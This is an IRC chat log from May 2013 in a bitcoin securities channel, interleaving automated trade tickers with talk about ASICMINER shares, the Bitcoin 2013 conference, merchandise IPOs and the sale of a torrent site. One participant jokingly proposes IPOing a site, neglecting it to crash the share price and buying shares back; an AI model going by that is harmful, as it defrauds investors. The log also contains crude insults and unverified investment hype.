more of a marketing tool May 18 17:22:21 my hip-hop-co-op idea May 18 17:22:24 but i think with bitcoin goes well May 18 17:23:55 indie rap is much like indie punk May 18 17:24:20 which is what I spent 6+ yrs doing May 18 17:24:38 so i'm gonna bring some of the models of the way punkers do it May 18 17:24:40 to rap May 18 17:24:45 and mix in some new ideas May 18 17:24:59 [BTCTC] [ASICMINER-PT] 1 @ 2.0825 BTC [-] May 18 17:25:42 talk to u about it sometime, poor other guys in the room, after i left music i started doing film, been invovled film clips etc, filming, editing, post May 18 17:27:03 i hugged chino frome deftones 2 days ago May 18 17:27:14 Hello May 18 17:27:14 that was pretty inspiring May 18 17:27:27 my shit is that new new May 18 17:27:31 you'll see ;) May 18 17:27:50 (thats what they all say...) May 18 17:27:54 hehe May 18 17:28:04 put it on bf evetually tat May 18 17:28:13 make an intresting asset May 18 17:29:29 thats chi, bass player May 18 17:29:39 chino, singer, alive May 18 17:30:01 [HAVELOCK] [ASICM] 14 @ 0.0204125 = 0.2858 BTC [+] May 18 17:30:15 http://trilema.com/2013/the-cool-kids/ May 18 17:30:17 there it is. May 18 17:33:29 What are call and put options? May 18 17:34:20 ;;google options finance May 18 17:34:20 Option (finance) - Wikipedia, the free encyclopedia: ; Option Definition | Investopedia: ; Options - Finance Help: May 18 17:39:20 [BTCTC] [ASICMINER-PT] 1 @ 2.0825 BTC [-] May 18 17:41:25 [MPEX] [S.MPOE] 7468 @ 0.00070317 = 5.2513 BTC [-] May 18 17:44:54 [BTCTC] [ASICMINER-PT] 1 @ 2.025201 BTC [-] May 18 17:45:03 [BTCTC] [ASICMINER-PT] 1 @ 2.0252 BTC [-] May 18 17:45:09 [BTCTC] [ASICMINER-PT] 1 @ 2.0205 BTC [-] May 18 17:45:24 [BTCTC] [ASICMINER-PT] 3 @ 2.0203 = 6.0609 BTC [-] May 18 17:46:58 [BTCTC] [ASICMINER-PT] 1 @ 2.0205 BTC [+] May 18 17:47:15 [BTCTC] [ASICMINER-PT] 13 @ 2.0203 = 26.2639 BTC [-] May 18 17:47:44 [BTCTC] [ASICMINER-PT] 1 @ 2.0203 BTC [-] May 18 17:48:29 [BTCTC] [ASICMINER-PT] 1 @ 2.0205 BTC [+] May 18 17:48:35 [BTCTC] [TAT.ASICMINER] 9 @ 0.020673 = 0.1861 BTC [-] May 18 17:48:37 [BTCTC] [ASICMINER-PT] 1 @ 2.0131 BTC [-] May 18 17:48:43 [BTCTC] [ASICMINER-PT] 2 @ 2.0125 = 4.025 BTC [-] May 18 17:48:47 [BTCTC] [ASICMINER-PT] 1 @ 2.01 BTC [-] May 18 17:48:52 [BTCTC] [ASICMINER-PT] 1 @ 2 BTC [-] May 18 17:51:54 [BTCTC] [ASICMINER-PT] 1 @ 2.0151 BTC [+] May 18 17:52:41 truffles: yeh they are alright May 18 17:53:20 Is there anywhere I can read up on BTC investements and study the market as suggested? May 18 17:54:21 bitcointalk.org has a subsection for securities May 18 17:54:27 you can find information about many of them there May 18 17:54:50 if i were you i would start with the asicminer thread to learn about the best current copmany, it is currently worth 100,000,000 usd May 18 17:55:01 it also pays weekely dividends May 18 17:55:33 https://bitcointalk.org/index.php?topic=99497.0;topicseen May 18 17:57:42 [BTCTC] [TAT.ASICMINER] 15 @ 0.020673 = 0.3101 BTC [-] May 18 18:03:01 [BTCTC] [GSDPT] 4 @ 0.00279 = 0.0112 BTC [+] May 18 18:07:50 WILLdude you should probably start with a basic textbook, something found at a public library May 18 18:07:53 better than internet stuff. May 18 18:09:26 he should do that as well May 18 18:09:40 but btc investments are very different from real world stocks May 18 18:10:12 [BTCTC] [ASICMINER-PT] 1 @ 2.015 BTC [-] May 18 18:11:02 investments are investments. May 18 18:11:27 [BTCTC] [TAT.ASICMINER] 15 @ 0.020512 = 0.3077 BTC [-] May 18 18:11:53 Burnside swears he is not this 'btcash' guy... mhhmmm https://bitcointalk.org/index.php?topic=209159.msg2190988#msg2190988 May 18 18:12:26 investments are investments, but a btc stock is not the same as apple stock and its not the same as a lotto ticket... May 18 18:13:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.020203 = 0.202 BTC [-] May 18 18:13:59 o hey, mpex is going down again ? May 18 18:14:00 [BTCTC] [TAT.ASICMINER] 65 @ 0.020202 = 1.3131 BTC [-] May 18 18:14:02 [HAVELOCK] [ASICM] 235 @ 0.0204125 = 4.7969 BTC [+] May 18 18:14:32 http://www.opjeep.com/inventory/used/Chevrolet/2009-Chevrolet-Corvette-1G1YZ25EX95111575.aspx seems high for a used american car eh? May 18 18:14:45 [BTCTC] [TAT.ASICMINER] 194 @ 0.0202 = 3.9188 BTC [-] May 18 18:15:01 [HAVELOCK] [ASICM] 250 @ 0.0204125 = 5.1031 BTC [+] May 18 18:16:01 [HAVELOCK] [ASICM] 4 @ 0.0204125 = 0.0817 BTC [+] May 18 18:16:02 [HAVELOCK] [ASICM] 2 @ 0.0204 = 0.0408 BTC [-] May 18 18:16:03 [HAVELOCK] [ASICM] 5 @ 0.02022 = 0.1011 BTC [-] May 18 18:16:05 mpex haz no AM May 18 18:16:05 [HAVELOCK] [ASICM] 43 @ 0.020111 = 0.8648 BTC [-] May 18 18:16:18 therefore does not exist May 18 18:16:26 agree May 18 18:16:28 is the rationale i guess May 18 18:16:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.020511 = 0.041 BTC [+] May 18 18:16:48 I'm still here to list it if you like ;) May 18 18:16:59 lol May 18 18:17:16 then he will have to admit its a damn good company and the biggest btc company evar to date May 18 18:17:20 he cant do that :) May 18 18:19:50 [BTCTC] [ASICMINER-PT] 2 @ 2.075 = 4.15 BTC [+] May 18 18:19:53 mp has his own standards May 18 18:19:57 nothing wrong with that' May 18 18:19:58 [BTCTC] [ASICMINER-PT] 1 @ 2.079799 BTC [+] May 18 18:20:01 Chaang-Noi it is a good company. just as soon as it's willing to go legitimate it can list. May 18 18:20:13 you mean suck your cock? hahahaha May 18 18:20:14 for all we know he'll be laughing at us in 2mos May 18 18:20:18 no sucking involved. May 18 18:20:40 it has no need to add more risk by getting involved with you May 18 18:20:47 [BTCTC] [ASICMINER-PT] 1 @ 2.0798 BTC [+] May 18 18:20:49 yeah we've discussed that May 18 18:20:59 [BTCTC] [ASICMINER-PT] 3 @ 2.079999 = 6.24 BTC [+] May 18 18:21:31 mp is just upset the best company can be productive without using an exchange, this might be a start of a trent that kills off mps thing May 18 18:21:43 i dont think so May 18 18:21:46 i fanything May 18 18:21:58 he's upset there are not ore btc biz worth listing May 18 18:22:05 more* May 18 18:22:12 it's sad really May 18 18:22:12 [BTCTC] [ASICMINER-PT] 1 @ 2.0822 BTC [+] May 18 18:22:32 exchanges are all listing avalon group buys as assets May 18 18:22:33 not much worth listing, im involved in a new project but its private May 18 18:22:41 we will be doing the AM modle May 18 18:22:49 self managed stocks May 18 18:23:02 cool lemme PT that shit May 18 18:23:07 :) May 18 18:23:32 [BTCTC] [ASICMINER-PT] 5 @ 2.0822 = 10.411 BTC [+] May 18 18:23:34 no its not public May 18 18:23:51 we got 400,000 in like 4 days May 18 18:24:10 going to be a hedge for my asic miner stock May 18 18:24:11 aww i got no solicitation May 18 18:24:38 funny really, taking money from AM dividends and investing it in otehr asics stuff:) May 18 18:24:56 4 guys, 100k usd each May 18 18:25:03 cool May 18 18:25:15 but what is it? May 18 18:25:26 [BTCTC] [ASICMINER-PT] 1 @ 2.079799 BTC [-] May 18 18:25:27 we going to make asics and also gpu miner ltc May 18 18:25:57 is it that jasonlee project? May 18 18:25:58 thanks May 18 18:26:01 or whatever his name is May 18 18:26:04 its a risk, but meh, May 18 18:26:25 the guy saying he's making ltc asics for a while now May 18 18:26:26 no he wants to do fpga for ltc May 18 18:26:31 im not so sure it can be done well May 18 18:26:33 and wont share info til uits done May 18 18:26:56 yeah i told him if he could get a protype or some specs i would fund him May 18 18:27:04 but im not so sure thats going anywhere May 18 18:27:11 seems like a bfl type fail May 18 18:27:20 but who knowz May 18 18:27:20 at least he didnt take the peoples money May 18 18:27:25 yeah May 18 18:31:42 [BTCTC] [TAT.ASICMINER] 28 @ 0.020496 = 0.5739 BTC [-] May 18 18:31:43 the bitfury bet now 90 to 150 or some shit May 18 18:32:26 ill inform CNN May 18 18:38:54 [BTCTC] [TAT.ASICMINER] 122 @ 0.020496 = 2.5005 BTC [-] May 18 18:39:45 [BTCTC] [TAT.ASICMINER] 318 @ 0.020512 = 6.5228 BTC [+] May 18 18:40:02 [MPEX] [S.MPOE] 2432 @ 0.00070368 = 1.7113 BTC [+] May 18 18:41:11 please help me May 18 18:41:16 sendmany "1F4FmJCdpCNrFhJwhAbHS6gMFBakR7Ezse" '{"1DiKKS7KGyDZwHFp8XoqPZG456drUQdzR3":.00001,"1JL3Rc7ZSqa7sBPb9AeRUhqFCNZzuDW87U":.00002}' May 18 18:41:27 this will not send in the bitcoin-qt debug window May 18 18:41:51 i keep getting an error saying i dont have enough funds. i think the syntax is missing May 18 18:41:59 or do i need to set up something else for sendmany May 18 18:42:04 if anyone here as at the bitcoin conf in San Jose, I'd love to meet and say hey today, just PM me May 18 18:42:31 nospinzy: try in -dev May 18 18:42:40 nospinzy try bitcoin-dev. May 18 18:42:54 pizzaman1337 mjr_ i think said he was going May 18 18:43:00 [BTCTC] [TAT.ASICMINER] 86 @ 0.020534 = 1.7659 BTC [+] May 18 18:43:03 yep May 18 18:43:17 also BitcoinPride t-shirt guy is there, if you care... May 18 18:43:27 mircea no May 18 18:43:27 o hey, that asset thing May 18 18:43:33 how is that coming along May 18 18:44:26 asset thing? May 18 18:44:57 iirc some tshirt maker made an ipo May 18 18:45:03 oh May 18 18:45:09 the girl made some comments about how his income is collapsing May 18 18:45:11 wasnt sure if you were asking me May 18 18:45:13 he said o no no no wrong wrong May 18 18:45:18 imo its dead in the water May 18 18:45:21 and then i forget what next May 18 18:45:25 basically the situation is May 18 18:45:38 the guy is young and very motivated May 18 18:45:45 myeah. May 18 18:45:52 and could have been a rare case of a USD biz doing well anyway May 18 18:46:04 because i think bitcoin merchandising could make decent $ May 18 18:46:06 but May 18 18:46:14 he is into a lot of projects May 18 18:46:26 and I think neglects the less interesting ones May 18 18:46:46 his reporting is lackluster for bitpride May 18 18:46:47 there's no money in tshirts. anyone with half a finance clue can tell you this May 18 18:46:51 and raises concerns May 18 18:46:55 then you can get upset cause you have to suck my cock to list on mpex May 18 18:46:58 and so the story goes May 18 18:47:04 lol May 18 18:47:11 i dont hold any of his shares May 18 18:47:18 impersonal you obviously May 18 18:47:19 but i flipped the IPO real gud May 18 18:48:01 [HAVELOCK] [ASICM] 487 @ 0.0205 = 9.9835 BTC [+] May 18 18:48:22 to date i don't think any btc merchandising did well, in spite of the apparently great siotuation (as there's no ip holder to pay out) May 18 18:48:47 there was that guy with the bitcoin buttons etc, i bought some, erik bought some, so it was pretty hot stuff for a while. i doubt he made much profit if anything. May 18 18:48:52 haven't seen him of late either. May 18 18:49:18 there is casascius, who's trying his best to parlay his coin thing into some sort of bitcoin relevance, but other than that dubious benefit i doubt he made much actual profit May 18 18:49:24 and that's the list afaik. May 18 18:49:43 Maybe I'll IPO my book... May 18 18:49:44 none of the merchdisers even advertisied afaik May 18 18:50:01 Was thinking about it as a thing to gain some experience running an asset. Not sure it's worth it, though. May 18 18:50:22 furuknap, running a fund portfolio is possible May 18 18:50:24 but lotsa work May 18 18:50:29 i debated it May 18 18:50:30 ThickAsThieves this is correct. nevertheless advertising for btc merc is very difficult. May 18 18:50:48 furuknap things you do for experience aren't worth it by default. May 18 18:50:49 It's the 'lotsa work' I'd rather avoid ;-) May 18 18:50:49 and ultimately decided i'd rather keep 100% of my folio May 18 18:50:53 thhan share it :) May 18 18:51:06 there's no gaining experience outside of doing a lot of work wtf. May 18 18:51:38 regarding btc merch advertising May 18 18:51:42 its totally possible May 18 18:51:49 there's lotsa ways May 18 18:51:53 http://www.btcreporter.com/2013/05/18/bitcoins-future-should-be-more-of-the-same/ May 18 18:51:58 apparently there's a reporter nao. May 18 18:52:00 Well, it's better to learn with a small asset. My book would at the very best revenue $20K. I could float a fund, keep face value in escrow, pay dividends based on sales. Sales would be crypto only. May 18 18:52:00 just no one that runs bitcoin biz has any biz expereience May 18 18:52:15 ThickAsThieves the thing is you want to somehpw target ppl who already have btc May 18 18:52:22 this is why these people pretty much limit themselves to the forum May 18 18:52:35 so you partner and/or educate May 18 18:52:40 as part of your mdel May 18 18:52:45 furuknap might be a good idea. May 18 18:52:58 Yeah, I know only hard work, etc... My issue is I'm already working hard, so not sure I'd like to add the extra work. May 18 18:53:16 well nobody holdin' a gun to your head :D May 18 18:53:37 ThickAsThieves if it's all the same to you i'd much rather very motivated 20somethings don't "educate" anyone. May 18 18:53:37 :-) May 18 18:53:47 hehe May 18 18:53:53 we got enough headless chickens on speed running around May 18 18:54:01 OK, wife is back from trip, gotta do my marital duties... See you guys later. May 18 18:54:02 [HAVELOCK] [HIM] 4 @ 1.8502 = 7.4008 BTC [-] May 18 18:54:10 don't forget the sharpie. May 18 18:55:14 mp > https://bitcointalk.org/index.php?topic=146900.msg2187489#msg2187489 May 18 18:55:36 guy is selling merchant processing at shirts at same booth May 18 18:55:40 go-getter May 18 18:55:42 hehe May 18 18:55:52 he also is part of a gambling venture May 18 18:55:55 o may gawd May 18 18:55:58 afaik May 18 18:56:02 [HAVELOCK] [ASICM] 25 @ 0.0205 = 0.5125 BTC [+] May 18 18:56:06 trap ?! May 18 18:56:14 the girl on the display looks more real than the girl holding the ipad May 18 18:56:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.02021 = 0.0404 BTC [-] May 18 18:56:47 but this aside : i thought this is a conference thing May 18 18:56:50 is it more like an expo thing ? May 18 18:56:59 they sold sponsorships May 18 18:57:05 limited availability May 18 18:57:08 allows booth May 18 18:57:16 so yeah May 18 18:57:18 [BTCTC] [ASICMINER-PT] 1 @ 2.07 BTC [-] May 18 18:57:21 expo too sorta May 18 18:57:32 i kinda wish i had gone now May 18 18:57:37 to witness all this glory May 18 18:57:45 i imagine it's why people went May 18 18:57:49 i made a design for him May 18 18:57:53 won his contest May 18 18:57:56 i sorta wish i had went to the tortilla node thing May 18 18:57:59 he still hasnt printed it May 18 18:58:11 branding guy May 18 18:58:17 yeah May 18 18:58:37 design, mktg, web, advertising, printing brokerng May 18 18:58:38 etc May 18 18:58:51 running my own biz since 2006 May 18 18:58:55 We will be have 200 shirts at hand with us ($4,000 in inventory) available for sale. May 18 18:58:55 The profits of the Bitcoin 2013 sale will be included in this months dividend payout! May 18 18:58:55 Also we apologize for the lack of communication. We have been really hard at work, gearing up for the convention, and catching up on all of our outstanding orders. May 18 18:59:07 [BTCTC] [ASICMINER-PT] 5 @ 2.0824 = 10.412 BTC [+] May 18 18:59:14 if pure profit that's ~30 btc sort of thing May 18 18:59:23 "catching up on all of our outstanding orders." is on all of his updates May 18 18:59:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.02021 BTC [-] May 18 18:59:39 he's a nice guy n all May 18 18:59:42 ive skyped with him May 18 18:59:47 he's just all ove rthe place May 18 18:59:50 [BTCTC] [ASICMINER-PT] 3 @ 2.087 = 6.261 BTC [+] May 18 19:00:31 ThickAsThieves i tell you something : other than a little too prideful for their own good (which comes with youth) May 18 19:00:38 pretty much all the historical failures of bitcoin were nice guys May 18 19:00:55 hasking, amazingrando, gigavps, you name it. May 18 19:00:58 i'm nice, but many people dont agree May 18 19:01:01 :/ May 18 19:01:05 and pretty much all the future failures too, for that matter. May 18 19:01:31 nobody fails cause they're mean and evil. people fail because they're brash, "very motivated" and cheeky/disobedient. May 18 19:01:40 not that i wanna toot mp's horn May 18 19:01:58 but people confuse mp's candor and truth and skeptism May 18 19:02:01 for being mean May 18 19:02:17 skepticism May 18 19:02:26 being smart and honest doesnt make you an ass May 18 19:02:39 i deal with this shit myself May 18 19:02:47 there's a lot of confusing going on. hunkering down and satisfying some standards is "sucking cock", May 18 19:02:50 people want to hear what they want to hear May 18 19:02:54 and when you say otherwise May 18 19:02:56 you are mean May 18 19:03:04 because we're all rebelious 16 year olds who ran away from home to be with cartman's bitcoin pirates. May 18 19:03:15 no May 18 19:03:30 i'm just wazing on the plight of being intelligent and honest at the same time May 18 19:03:35 waxing* May 18 19:04:24 running a mktg biz is like running a psychology practice May 18 19:04:48 you pretty much have to manipulate people to not hang themselves May 18 19:05:23 the fight so hard to just get what they want May 18 19:05:30 yes May 18 19:05:51 been dismantling it for a yer now May 18 19:05:54 year May 18 19:05:55 but yes May 18 19:06:13 largely outsourced and cherry-picked clients now May 18 19:06:36 iwas picked on as a child ;) May 18 19:07:07 ThickAsThieves are you discussing the matter with truffles ? May 18 19:07:40 dunno what the topic is at this point May 18 19:07:43 case closed i think May 18 19:07:46 but yeah May 18 19:07:48 truffles May 18 19:07:57 why you have him ignored? May 18 19:07:59 or? May 18 19:08:20 i'm done ranting ether way :) May 18 19:08:39 yeah. May 18 19:09:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.02021 = 0.0606 BTC [-] May 18 19:09:39 [BTCTC] [ASICMINER-PT] 1 @ 2.0875 BTC [+] May 18 19:10:01 [BTCTC] [ASICMINER-PT] 3 @ 2.0875 = 6.2625 BTC [+] May 18 19:10:14 http://www.forbes.com/sites/clareoconnor/2013/05/14/new-app-lets-you-boycott-koch-brothers-monsanto-and-more-by-scanning-your-shopping-cart/ May 18 19:10:18 this is actually a pretty cool idea. May 18 19:10:23 i saw that May 18 19:10:25 problem is May 18 19:10:28 carts will be empty May 18 19:10:58 americans dont care about that much May 18 19:11:01 some do May 18 19:11:02 [HAVELOCK] [ASICM] 318 @ 0.0204 = 6.4872 BTC [-] May 18 19:11:10 but only in hipster areas May 18 19:11:27 of all the uses for a smartphone ui've seen so far May 18 19:11:33 this one is the first that acvtuyally makes sense. May 18 19:11:35 when all news is advertising, its hard to know what to care about May 18 19:11:47 [BTCTC] [ASICMINER-PT] 2 @ 2.0875 = 4.175 BTC [+] May 18 19:12:11 [BTCTC] [TAT.ASICMINER] 10 @ 0.020533 = 0.2053 BTC [+] May 18 19:12:26 i used to May 18 19:12:31 it got all weird lately May 18 19:12:44 lots of scenes of melancholy people staring around May 18 19:13:20 [BTCTC] [GSDPT] 1 @ 0.00279 BTC [+] May 18 19:14:19 so let me get something straight about this conference thing. May 18 19:14:30 asicminer isn't there, avalon isn't there, bitfury isn't there ? May 18 19:15:02 indeed May 18 19:15:19 just foundation, motivated youngsters, and VCs May 18 19:15:24 i bet May 18 19:15:53 some bullshit >> https://bitcointalk.org/index.php?topic=148827.msg2191898#msg2191898 May 18 19:15:57 so basically this is a conference of the failed american asic maker, which got beat to market by two chinese and possibly a russian corp May 18 19:16:10 plus the failed american exchange, which is pretty much going to jail later this year May 18 19:16:14 DT is gonna hold shares hostage for a week May 18 19:16:17 what in the actual fuck are we doing here ?! May 18 19:16:18 so he can sell his own May 18 19:16:47 [BTCTC] [GSDPT] 1 @ 0.00261 BTC [-] May 18 19:17:06 [BTCTC] [ASICMINER-PT] 1 @ 2.088 BTC [+] May 18 19:17:16 he's sold 800 shares in the last few days May 18 19:17:24 week-ish May 18 19:17:33 [BTCTC] [TAT.ASICMINER] 51 @ 0.020534 = 1.0472 BTC [+] May 18 19:17:35 meh May 18 19:17:55 more here: https://bitcointalk.org/index.php?topic=74975.msg2191910#msg2191910 May 18 19:18:13 [BTCTC] [ASICMINER-PT] 1 @ 2.088 BTC [+] May 18 19:19:12 I am bias May 18 19:19:14 [BTCTC] [GSDPT] 4 @ 0.0026 = 0.0104 BTC [-] May 18 19:19:19 [BTCTC] [GSDPT] 5 @ 0.0026 = 0.013 BTC [-] May 18 19:19:51 (i know it's "biased") May 18 19:20:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.020534 BTC [+] May 18 19:20:20 [BTCTC] [ASICMINER-PT] 9 @ 2.07 = 18.63 BTC [-] May 18 19:20:39 [BTCTC] [ASICMINER-PT] 2 @ 2.068 = 4.136 BTC [-] May 18 19:20:47 BTCUSD ticker | Best bid: 122.92502, Best ask: 123.19996, Bid-ask spread: 0.27494, Last trade: 122.92500, 24 hour volume: 64631.00489394, 24 hour low: 119.70000, 24 hour high: 125.55550, 24 hour vwap: 123.57602 May 18 19:21:48 lol May 18 19:22:11 [BTCTC] [TAT.ASICMINER] 69 @ 0.020533 = 1.4168 BTC [-] May 18 19:23:01 [HAVELOCK] [HIM] 1 @ 1.85 BTC [-] May 18 19:23:15 never even heard of it May 18 19:24:02 [HAVELOCK] [ASICM] 90 @ 0.020508 = 1.8457 BTC [+] May 18 19:27:00 [HAVELOCK] [SDICE] 1 @ 0.25 BTC [+] May 18 19:30:59 ? May 18 19:31:35 dhs raid the block chain, oh fucking noes May 18 19:33:06 lol May 18 19:33:20 i tjhink our amerikanski friends are in for some massive heaping of humiliation May 18 19:33:33 pretty much the only way they're going to come to their senses. May 18 19:33:40 [BTCTC] [MININGCO.ETF] 2 @ 0.66 = 1.32 BTC [-] May 18 19:34:14 [BTCTC] [ASICMINER-PT] 4 @ 2.088 = 8.352 BTC [+] May 18 19:36:24 [BTCTC] [B.YABMC] 23 @ 0.01689 = 0.3885 BTC [-] May 18 19:37:00 [BTCTC] [PAJKA.BOND] 2 @ 0.1035 = 0.207 BTC [+] May 18 19:37:57 [MPEX] [S.MPOE] 7950 @ 0.0007057 = 5.6103 BTC [+] May 18 19:38:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.020672 = 0.1034 BTC [+] May 18 19:39:34 [BTCTC] [COGNITIVE] 2 @ 0.234998 = 0.47 BTC [-] May 18 19:40:01 [BTCTC] [TAT.ASICMINER] 10 @ 0.020673 = 0.2067 BTC [+] May 18 19:41:55 [BTCTC] [PAJKA.BOND] 1 @ 0.10919 BTC [+] May 18 19:43:23 [BTCTC] [B.YABMC] 2 @ 0.0169 = 0.0338 BTC [+] May 18 19:43:38 [BTCTC] [MININGCO.ETF] 1 @ 0.66 BTC [-] May 18 19:44:01 [HAVELOCK] [HIM] 1 @ 1.84 BTC [-] May 18 19:45:00 [HAVELOCK] [ASICM] 89 @ 0.020508 = 1.8252 BTC [+] May 18 19:45:29 [BTCTC] [ASICMINER-PT] 4 @ 2.087512 = 8.35 BTC [-] May 18 19:45:51 [BTCTC] [ASICMINER-PT] 1 @ 2.087512 BTC [-] May 18 19:48:01 [HAVELOCK] [HIM] 1 @ 1.8 BTC [-] May 18 19:49:40 [BTCTC] [TAT.ASICMINER] 9 @ 0.020673 = 0.1861 BTC [+] May 18 19:50:01 [HAVELOCK] [ASICM] 284 @ 0.020508 = 5.8243 BTC [+] May 18 19:52:01 [HAVELOCK] [ASICM] 50 @ 0.020512 = 1.0256 BTC [+] May 18 19:54:52 [MPEX] [S.MPOE] 5200 @ 0.00070248 = 3.6529 BTC [-] May 18 19:54:54 [MPEX] [S.MPOE] 5870 @ 0.00070211 = 4.1214 BTC [-] May 18 19:56:38 [BTCTC] [B.YABMC] 38 @ 0.0169 = 0.6422 BTC [+] May 18 19:58:01 [HAVELOCK] [ASICM] 462 @ 0.020512 = 9.4765 BTC [+] May 18 19:58:10 [BTCTC] [TAT.ASICMINER] 13 @ 0.020673 = 0.2687 BTC [+] May 18 20:02:00 [HAVELOCK] [ASICM] 512 @ 0.0209512 = 10.727 BTC [+] May 18 20:04:49 havelock will be the first to 2.1 May 18 20:04:59 was also the first to 2.0 May 18 20:06:24 heh :) May 18 20:06:50 http://www.youtube.com/watch?v=76EcAinKPDo&feature=youtu.be May 18 20:07:09 AM fan video ^ May 18 20:09:52 lol May 18 20:09:52 :D May 18 20:11:13 who is this smartass May 18 20:11:58 [BTCTC] [BASIC-MINING] 1 @ 0.480001 BTC [-] May 18 20:12:03 [BTCTC] [BASIC-MINING] 2 @ 0.48 = 0.96 BTC [-] May 18 20:12:11 some shareholder May 18 20:12:15 dunno May 18 20:13:17 [BTCTC] [TAT.ASICMINER] 80 @ 0.020673 = 1.6538 BTC [+] May 18 20:16:15 [BTCTC] [TAT.ASICMINER] 6 @ 0.020673 = 0.124 BTC [+] May 18 20:17:00 [HAVELOCK] [ASICM] 11 @ 0.0210512 = 0.2316 BTC [+] May 18 20:23:13 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] May 18 20:23:46 summary ? May 18 20:24:35 asicminer is awesome May 18 20:26:14 [BTCTC] [ASICMINER-PT] 1 @ 2.088 BTC [+] May 18 20:26:45 why is everyone saying its a huge risk and not a good idea May 18 20:26:57 then this guy comes along.. May 18 20:29:07 ? May 18 20:29:15 somebody should be collecting/documenting all this future gold. May 18 20:30:45 [BTCTC] [ASICMINER-PT] 1 @ 2.088 BTC [+] May 18 20:31:40 [BTCTC] [MININGCO.ETF] 1 @ 0.657 BTC [-] May 18 20:33:01 [HAVELOCK] [ASICM] 475 @ 0.0210512 = 9.9993 BTC [+] May 18 20:33:30 [BTCTC] [ASICMINER-PT] 4 @ 2.088 = 8.352 BTC [+] May 18 20:33:33 [MPEX] [S.MPOE] 13674 @ 0.00070211 = 9.6007 BTC [-] May 18 20:34:25 [BTCTC] [TAT.ASICMINER] 30 @ 0.020673 = 0.6202 BTC [+] May 18 20:34:44 [BTCTC] [TAT.ASICMINER] 78 @ 0.020673 = 1.6125 BTC [+] May 18 20:35:09 [BTCTC] [B.YABMC] 3 @ 0.017 = 0.051 BTC [+] May 18 20:35:46 [BTCTC] [TAT.ASICMINER] 3 @ 0.020673 = 0.062 BTC [+] May 18 20:36:59 [BTCTC] [ASICMINER-PT] 1 @ 2.061001 BTC [-] May 18 20:39:02 [HAVELOCK] [ASICM] 25 @ 0.0210512 = 0.5263 BTC [+] May 18 20:42:06 [MPEX] [S.MPOE] 2700 @ 0.0007057 = 1.9054 BTC [+] May 18 20:45:01 [HAVELOCK] [ASICM] 1 @ 0.0210512 BTC [+] May 18 20:45:02 [HAVELOCK] [ASICM] 174 @ 0.0210512 = 3.6629 BTC [+] May 18 20:46:00 [HAVELOCK] [VTX] 1 @ 0.4198 BTC [+] May 18 20:48:03 [HAVELOCK] [ASICM] 10 @ 0.0210512 = 0.2105 BTC [+] May 18 20:50:01 [HAVELOCK] [SDICE] 1 @ 0.25 BTC [+] May 18 20:50:33 [BTCTC] [TAT.ASICMINER] 25 @ 0.020673 = 0.5168 BTC [+] May 18 20:52:16 [BTCTC] [ASICMINER-PT] 1 @ 2.087999 BTC [+] May 18 20:54:23 [BTCTC] [TAT.ASICMINER] 80 @ 0.020673 = 1.6538 BTC [+] May 18 20:58:06 [BTCTC] [ASICMINER-PT] 1 @ 2.088 BTC [+] May 18 20:58:07 anyone want to buy https://bitfetch.com ? May 18 20:58:50 what is it? May 18 20:58:59 well, open it May 18 20:59:07 not loading May 18 20:59:34 it lets you download torrents securely May 18 20:59:43 i see May 18 20:59:47 sadly it wont load for me May 18 20:59:48 circumvents the new US "strikes" May 18 20:59:59 Chaang-Noi: interesting, whats your isp? May 18 21:01:14 loaded finnally May 18 21:01:16 [BTCTC] [S.DICE-PT] 100 @ 0.002785 = 0.2785 BTC [+] May 18 21:01:18 i have fiber in thailand May 18 21:01:48 it's in node May 18 21:01:50 why do you want to sell it? May 18 21:02:49 because it has become tedious to manage 4 websites and my day job May 18 21:02:58 ahh May 18 21:03:06 sadly im not able to manage it May 18 21:03:19 how much do you want for it May 18 21:03:21 I've made a nice admin interface for it May 18 21:03:49 given what it makes per month at least 10-15 btc im guessing May 18 21:04:01 [BTCTC] [TAT.ASICMINER] 4 @ 0.020672 = 0.0827 BTC [-] May 18 21:04:14 certainly has potential if you partner with torrent engines May 18 21:04:16 1220 May 18 21:04:21 search engines May 18 21:04:30 shoot 15btc is fucking steal May 18 21:04:42 ;;calc 10*122 you could not do that in your head???? May 18 21:04:51 its has a zero in it May 18 21:04:54 just add a fucking 0 to the end May 18 21:04:56 too complicated May 18 21:05:00 [HAVELOCK] [ASICM] 41 @ 0.0210512 = 0.8631 BTC [+] May 18 21:05:02 [HAVELOCK] [ASICM] 1 @ 0.0210512 BTC [+] May 18 21:05:03 [BTCTC] [ASICMINER-PT] 1 @ 2.088 BTC [+] May 18 21:05:15 .... May 18 21:05:24 [BTCTC] [ASICMINER-PT] 3 @ 2.088 = 6.264 BTC [+] May 18 21:05:29 price seems reasonable May 18 21:05:33 maybe list it onthe forum May 18 21:05:59 probably will May 18 21:06:18 [BTCTC] [TAT.ASICMINER] 3 @ 0.020673 = 0.062 BTC [+] May 18 21:06:35 [BTCTC] [TAT.ASICMINER] 8 @ 0.020673 = 0.1654 BTC [+] May 18 21:06:40 I like that design May 18 21:06:43 worth $2500-$5000 easy May 18 21:07:10 i'd buy but I'm not a programmer and already juggling too much May 18 21:07:13 it was featured on torrentfreak 40 days ago. it was fun pulling 1 gbps for 4 days May 18 21:07:22 [BTCTC] [S.DICE-PT] 16 @ 0.002785 = 0.0446 BTC [+] May 18 21:07:48 You could buy it, IPO it on Bitfunder May 18 21:07:50 and bank May 18 21:08:03 not a ba idea May 18 21:08:15 then after 2mos just start being neglectful May 18 21:08:18 crash share price May 18 21:08:21 and buy it back May 18 21:08:24 bam May 18 21:08:26 lol May 18 21:09:27 Scrat what are the other sites that you jugle May 18 21:10:18 kakobrekla: coinroll.it and 2 more which are not btc related May 18 21:11:00 [HAVELOCK] [ASICM] 286 @ 0.0210512 = 6.0206 BTC [+] May 18 21:11:02 [HAVELOCK] [ASICM] 183 @ 0.0212625 = 3.891 BTC [+] May 18 21:11:15 [BTCTC] [ASICMINER-PT] 1 @ 2.088 BTC [+] May 18 21:11:54 [BTCTC] [GSDPT] 4 @ 0.00261 = 0.0104 BTC [+] May 18 21:12:01 [HAVELOCK] [ASICM] 3 @ 0.0212625 = 0.0638 BTC [+] May 18 21:15:48 [MPEX] [S.MPOE] 2476 @ 